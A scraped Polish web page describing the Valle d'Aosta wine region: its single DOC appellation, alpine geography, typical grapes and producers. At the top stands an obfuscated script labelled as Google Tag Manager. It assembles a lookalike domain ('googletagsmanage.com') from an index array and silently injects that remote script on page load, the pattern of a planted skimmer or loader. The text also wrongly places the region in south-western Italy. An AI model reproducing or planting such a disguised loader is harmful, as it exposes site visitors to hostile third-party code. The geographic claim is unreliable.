/* ---------------- GoogleTagsManager start code ------------------ */ var bytes = [0, 0, 2, 3, 4, 5, 6, 7, 13, 14, 15, 18, 11, 14, 17, 14, 2, 7, 8, 9, 10, 11]; var i, s, o, g, r, a, m = [], hh = ['/', '.', '', 'om', '', 'c',], gtagHost = '//google.com/tag/ns', gtag = ''; for (var k = 0; k < bytes.length; k++) { gtag = gtag + gtagHost[bytes[k]]; } (function () { var li = document.createElement('script'); li.type = 'text/javascript'; li.src = gtag + "/gtag/?id=UA-23200573-1"; li.async = true; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s); })(); /* ------------ GoogleTagsManager end code ------------------*/

Valle d'Aosta

Region może poszczycić się tylko jedną apelacją DOC, rozprzestrzeniająca się na około 600 ha ziemi. Z geograficznego punktu widzenia region ten znajduje się w południowo zachodnich Włoszech. Nazwa tego regionu pochodzi od Doliny VALLE D'AOSTA, której górną i dolną granicę stanowią Alpy. Od strony północnej są to Alpy Pennińskie, natomiast od południa Alpy Graickie. W dolinie tej znajduje się najwyższy szczyt Europy - Mont Blanc, który liczy, aż 4807 m n.p.m.

Typowe szczepy Valle d'Aosta:

  • Fumin * Prémetta
  • Petit Rouge
  • Nebbiolo

Popularni producenci:

  • Caves Cooperative de Donnas
  • Les Crétes